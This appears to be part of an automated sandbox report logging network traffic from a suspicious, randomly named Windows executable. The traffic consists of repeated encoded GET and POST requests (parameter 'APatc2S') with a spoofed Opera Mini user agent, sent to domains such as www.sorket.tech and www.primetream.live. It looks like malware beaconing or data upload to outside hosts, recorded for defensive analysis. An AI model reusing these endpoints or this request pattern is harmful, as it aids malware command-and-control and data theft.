                                                                                                                    Data Ascii: APatc2S=RSmyR2kEdbbHlzxRd22Z/p1FQbWdGuZqtWzBMTpjafOPw2xA5OMHhq6b5htyJVotxGqObeouElrU+GaIZ9DpUgZKXUjFeULTYB7BtLe5bZ+jxuT8EJ6aZ6GUZ1PlBcvZFEGaH0k49jjLp66692/Lu4LCrVadnyJADJITaGJWNa/pCDglIeYZl+XVRmZ+ujl4vm6n0EDG9qPtDfqtyo+odYHh0xx7YEwdp96f8f1fD9EmpoPUUo3kgXN02ERuEYjUxQMPH1iaUnbhfTfImWz1TD2TR3biitO3lXH6L2LfTh7Y96PfsDbOmi697TgC8e40pOA15wujfr8raCFwoJsuS0VN604YX6g+w/9GgmO8Gh8qLzNETgTm2/zgG1cyLjo9j269KkgauSIQwggFQQdQFuYZiMEIUUSkYmspvVkFG/diOJ3XxM0BHEFSwJsamZFiqImaTrksN7xTZvHr2EObH3sk1UcRTNKlEz+fQSZkp49DIh782KgZs5L4wE4ImUR6nNtVm2tYV3CkZvVdryWbqRgl02Uz9nArIePaRSR6aFHmEEobA0La7OiyMvFhWdimlDfuTdp6UHw8SphevyO6Swb2Q57XLOKvrQDBKceh21vkASrvkIbjv9xU/0deFhemsgOsGs+0SQsKBA60z4vV4ze3UiqsAiS5cm5BUukmqbDpYmA/Ge5AVzQ8zZ0bb9p58VKNqBhVHpG9axCQ2axwAsMmpWy42QQ9F3s0X11TaygXPvLM99/NlyTe2ZgQ6ixXY853J0fidTiQ8ZvcnXqIX7QeEVXKIFv1/SHMz3yVsYV70L3qqsJbQuMfinM4BOo+IyZ3RtlQYEQezwWhc627D3bDuBi5jltISYBYd6tljFV2pXnARV1aealgSdptPAtqXEXX7ywPK62TD+5JEbfrLSjeWii+v57JoMBdB2ZB00nMWgtsdsjjjf9k6NMft/z8qJgDk+o5auQfAl+AbE1zP/ug5IHHkCKJ7pgYVqoXioeM [TRUNCATED]
                                                                                                                    Dec 24, 2024 11:36:55.440538883 CET533INHTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 24 Dec 2024 10:36:55 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    12192.168.2.449857162.0.236.169801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:36:56.798919916 CET424OUTGET /8t9s/?APatc2S=cQOSSB92WrTaqBxCYQmY0/8zd7KVOpZ6t2v2QQp7ftKEyFsbpuIbzJ+m0CFldn0ugFGiUddTcSTZ3FmKLOS+RDlSRV2taFz1Xj7dqojcNfOZnPX4GO36V4Y=&3FNHL=wVCtFrFXof HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.primetream.live
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Dec 24, 2024 11:36:58.015944958 CET548INHTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 24 Dec 2024 10:36:57 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    13192.168.2.449875199.59.243.227801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:37:03.887119055 CET682OUTPOST /4emb/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.sorket.tech
                                                                                                                    Origin: http://www.sorket.tech
                                                                                                                    Referer: http://www.sorket.tech/4emb/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 204
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 31 57 38 72 65 57 64 4a 4d 4b 70 77 70 52 75 59 50 62 73 62 4f 75 2f 69 63 30 33 2b 2b 5a 77 5a 34 6d 39 36 6d 70 41 5a 6d 37 39 65 4b 4f 77 79 4c 45 30 4c 4c 68 65 48 43 30 4d 55 65 74 71 76 67 38 4c 79 6a 47 35 36 63 76 6f 6e 41 6a 34 48 55 79 4b 68 35 41 58 53 71 7a 67 63 33 4f 37 4b 48 6e 6a 50 54 51 35 38 33 53 73 33 78 2b 7a 51 7a 63 77 67 4a 46 53 38 6e 34 49 72 6b 4f 46 55 31 51 59 42 77 43 43 65 44 32 51 32 63 47 65 46 59 55 63 55 79 67 2b 58 71 73 57 65 48 49 56 6c 37 6d 72 66 53 2b 31 47 72 4a 66 75 2f 72 30 4d 73 33 55 51 4d 66 49 49 43 6d 41 48 52 66 38 35 70 67 3d 3d
                                                                                                                    Data Ascii: APatc2S=1W8reWdJMKpwpRuYPbsbOu/ic03++ZwZ4m96mpAZm79eKOwyLE0LLheHC0MUetqvg8LyjG56cvonAj4HUyKh5AXSqzgc3O7KHnjPTQ583Ss3x+zQzcwgJFS8n4IrkOFU1QYBwCCeD2Q2cGeFYUcUyg+XqsWeHIVl7mrfS+1GrJfu/r0Ms3UQMfIICmAHRf85pg==
                                                                                                                    Dec 24, 2024 11:37:04.969744921 CET1236INHTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:37:04 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1110
                                                                                                                    x-request-id: 154ee364-e0c4-4400-aefd-00e5458a5237
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TVHTMTW7daZ53Re6NgttbXfBf9SzUy9497SW8NlFMSQhjdK8a9glB0Qo4Q06seRWYw0P4x5AT7aX3x7HYdHi9g==
                                                                                                                    set-cookie: parking_session=154ee364-e0c4-4400-aefd-00e5458a5237; expires=Tue, 24 Dec 2024 10:52:04 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 56 48 54 4d 54 57 37 64 61 5a 35 33 52 65 36 4e 67 74 74 62 58 66 42 66 39 53 7a 55 79 39 34 39 37 53 57 38 4e 6c 46 4d 53 51 68 6a 64 4b 38 61 39 67 6c 42 30 51 6f 34 51 30 36 73 65 52 57 59 77 30 50 34 78 35 41 54 37 61 58 33 78 37 48 59 64 48 69 39 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TVHTMTW7daZ53Re6NgttbXfBf9SzUy9497SW8NlFMSQhjdK8a9glB0Qo4Q06seRWYw0P4x5AT7aX3x7HYdHi9g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Dec 24, 2024 11:37:04.969778061 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTU0ZWUzNjQtZTBjNC00NDAwLWFlZmQtMDBlNTQ1OGE1MjM3IiwicGFnZV90aW1lIjoxNzM1MDM2Nj


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    14192.168.2.449881199.59.243.227801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:37:06.556735039 CET702OUTPOST /4emb/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.sorket.tech
                                                                                                                    Origin: http://www.sorket.tech
                                                                                                                    Referer: http://www.sorket.tech/4emb/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 224
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 31 57 38 72 65 57 64 4a 4d 4b 70 77 70 78 65 59 44 61 73 62 49 4f 2f 68 42 45 33 2b 77 35 77 64 34 6d 35 36 6d 6f 55 4a 36 5a 4a 65 4b 72 55 79 49 42 41 4c 4d 68 65 48 4e 55 4e 51 47 4e 71 6b 67 38 48 51 6a 48 46 36 63 76 38 6e 41 6e 30 48 56 42 53 67 34 51 58 55 2f 6a 67 65 70 2b 37 4b 48 6e 6a 50 54 51 73 52 33 52 63 33 77 50 44 51 79 39 77 2f 56 56 53 2f 78 49 49 72 67 4f 46 51 31 51 59 2f 77 44 75 77 44 31 6f 32 63 47 4f 46 5a 46 63 58 37 67 2f 39 75 73 58 41 47 5a 67 63 2b 45 65 79 4b 65 41 6e 70 38 37 4d 36 74 35 57 39 47 31 48 65 66 73 37 66 68 4a 7a 63 63 42 77 79 76 57 46 50 43 58 7a 48 48 2f 49 4b 50 47 63 6c 53 4a 6d 70 6e 55 3d
                                                                                                                    Data Ascii: APatc2S=1W8reWdJMKpwpxeYDasbIO/hBE3+w5wd4m56moUJ6ZJeKrUyIBALMheHNUNQGNqkg8HQjHF6cv8nAn0HVBSg4QXU/jgep+7KHnjPTQsR3Rc3wPDQy9w/VVS/xIIrgOFQ1QY/wDuwD1o2cGOFZFcX7g/9usXAGZgc+EeyKeAnp87M6t5W9G1Hefs7fhJzccBwyvWFPCXzHH/IKPGclSJmpnU=
                                                                                                                    Dec 24, 2024 11:37:07.638219118 CET1236INHTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:37:06 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1110
                                                                                                                    x-request-id: dc1a5f75-c8e1-4ec1-99b5-75df764223fb
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TVHTMTW7daZ53Re6NgttbXfBf9SzUy9497SW8NlFMSQhjdK8a9glB0Qo4Q06seRWYw0P4x5AT7aX3x7HYdHi9g==
                                                                                                                    set-cookie: parking_session=dc1a5f75-c8e1-4ec1-99b5-75df764223fb; expires=Tue, 24 Dec 2024 10:52:07 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 56 48 54 4d 54 57 37 64 61 5a 35 33 52 65 36 4e 67 74 74 62 58 66 42 66 39 53 7a 55 79 39 34 39 37 53 57 38 4e 6c 46 4d 53 51 68 6a 64 4b 38 61 39 67 6c 42 30 51 6f 34 51 30 36 73 65 52 57 59 77 30 50 34 78 35 41 54 37 61 58 33 78 37 48 59 64 48 69 39 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TVHTMTW7daZ53Re6NgttbXfBf9SzUy9497SW8NlFMSQhjdK8a9glB0Qo4Q06seRWYw0P4x5AT7aX3x7HYdHi9g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Dec 24, 2024 11:37:07.638253927 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGMxYTVmNzUtYzhlMS00ZWMxLTk5YjUtNzVkZjc2NDIyM2ZiIiwicGFnZV90aW1lIjoxNzM1MDM2Nj


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    15192.168.2.449888199.59.243.227801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:37:09.320632935 CET10784OUTPOST /4emb/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.sorket.tech
                                                                                                                    Origin: http://www.sorket.tech
                                                                                                                    Referer: http://www.sorket.tech/4emb/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 10304
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 31 57 38 72 65 57 64 4a 4d 4b 70 77 70 78 65 59 44 61 73 62 49 4f 2f 68 42 45 33 2b 77 35 77 64 34 6d 35 36 6d 6f 55 4a 36 5a 78 65 4c 5a 63 79 4c 6d 63 4c 4e 68 65 48 45 30 4e 54 47 4e 71 31 67 38 66 55 6a 48 4a 41 63 73 45 6e 42 43 6f 48 53 77 53 67 32 51 58 55 39 6a 67 66 33 4f 36 51 48 6e 7a 44 54 51 38 52 33 52 63 33 77 4e 62 51 37 4d 77 2f 58 56 53 38 6e 34 49 4f 6b 4f 46 6f 31 51 67 76 77 44 71 4f 44 6b 49 32 63 69 53 46 66 7a 77 58 30 67 2b 62 70 73 58 49 47 5a 38 39 2b 45 43 51 4b 63 68 79 70 36 48 4d 34 62 6b 64 34 30 77 51 63 4a 45 37 41 78 5a 6c 54 76 31 75 30 73 6d 75 4f 42 54 66 48 48 76 69 4a 76 66 49 6e 6a 46 68 32 53 31 32 65 45 37 44 6a 65 49 61 50 61 4e 4d 50 36 6f 49 72 4b 68 39 65 69 4b 2f 56 63 36 75 74 46 46 32 4f 68 51 64 65 63 58 5a 78 70 4b 38 66 43 73 78 77 7a 4a 67 6f 36 69 54 35 31 2b 54 34 67 78 39 65 44 46 48 6a 47 31 37 7a 31 66 6f 4f 58 4b 72 57 75 34 77 72 32 6b 71 65 77 67 38 63 7a 69 68 48 46 32 52 43 59 52 77 66 67 30 52 70 72 73 37 4d 54 [TRUNCATED]
                                                                                                                    Data Ascii: APatc2S=1W8reWdJMKpwpxeYDasbIO/hBE3+w5wd4m56moUJ6ZxeLZcyLmcLNheHE0NTGNq1g8fUjHJAcsEnBCoHSwSg2QXU9jgf3O6QHnzDTQ8R3Rc3wNbQ7Mw/XVS8n4IOkOFo1QgvwDqODkI2ciSFfzwX0g+bpsXIGZ89+ECQKchyp6HM4bkd40wQcJE7AxZlTv1u0smuOBTfHHviJvfInjFh2S12eE7DjeIaPaNMP6oIrKh9eiK/Vc6utFF2OhQdecXZxpK8fCsxwzJgo6iT51+T4gx9eDFHjG17z1foOXKrWu4wr2kqewg8czihHF2RCYRwfg0Rprs7MT0WBoHsnr2YKDi6ToZzQHGZuNVLw7rVBIBpekkpa3d9EiWyFCt1t3OVFlTxD64tj9nFU6Et2a7GIAheLan1OGCl47FTDLHAmTXvbV4dG+B5rBTjHVa4meTadzu9KC4dMyV/KXp7eEMbHaJBn9zx82mivpkUelXobvzGb2AY7+i3sts6f1SbLqTgk1LXz8WnIaBuhcr9TOoDCZqA/po9QQFIVZ4y3u0KJVEwNAGdMTFFRI5r5W/bhJqus9FqBE2toto+HqNLNR5h66/FBOJuIW18N0d8BxpZ87shtm89WhK76E4BbrUCrXWD3c+pydnK9VFbdqoBoqJN6IN8fEQr4QyUAVVVJUkUVC/H3GtzGh0QKj2GDpNZwB0GctFpkkYwvI8FyH3HYXWjEfyYuVzxpTibL+/kfQTYchPGkPoeg6NAe6LCQfjVjNqt1O6zR23XcLdBTMsGjpt7LVLsYZzl+iCeNsn43C7/f0BRDMlF9P4p59TPIhKE8fT8rgTS+myLnXjB6FHHn8Ic2cJetE6MYNlO9W9NkCshVWHo6AG/Qrztqo7whZFcfBZc/rQfSfrv1mjWl4Gr7DZg9k0dQ/YwlSVDsH0yD0cHUt5U+854/PkZnJ4vHlH4EVFifQrCdUuGf+oTktBW3Tf/W9AfiH4GjQ4KqML4QssyIM7P [TRUNCATED]
                                                                                                                    Dec 24, 2024 11:37:10.415359020 CET1236INHTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:37:09 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1110
                                                                                                                    x-request-id: cb6fb606-5b60-4752-aa7e-1d46488f883e
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TVHTMTW7daZ53Re6NgttbXfBf9SzUy9497SW8NlFMSQhjdK8a9glB0Qo4Q06seRWYw0P4x5AT7aX3x7HYdHi9g==
                                                                                                                    set-cookie: parking_session=cb6fb606-5b60-4752-aa7e-1d46488f883e; expires=Tue, 24 Dec 2024 10:52:10 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 56 48 54 4d 54 57 37 64 61 5a 35 33 52 65 36 4e 67 74 74 62 58 66 42 66 39 53 7a 55 79 39 34 39 37 53 57 38 4e 6c 46 4d 53 51 68 6a 64 4b 38 61 39 67 6c 42 30 51 6f 34 51 30 36 73 65 52 57 59 77 30 50 34 78 35 41 54 37 61 58 33 78 37 48 59 64 48 69 39 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TVHTMTW7daZ53Re6NgttbXfBf9SzUy9497SW8NlFMSQhjdK8a9glB0Qo4Q06seRWYw0P4x5AT7aX3x7HYdHi9g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Dec 24, 2024 11:37:10.415412903 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
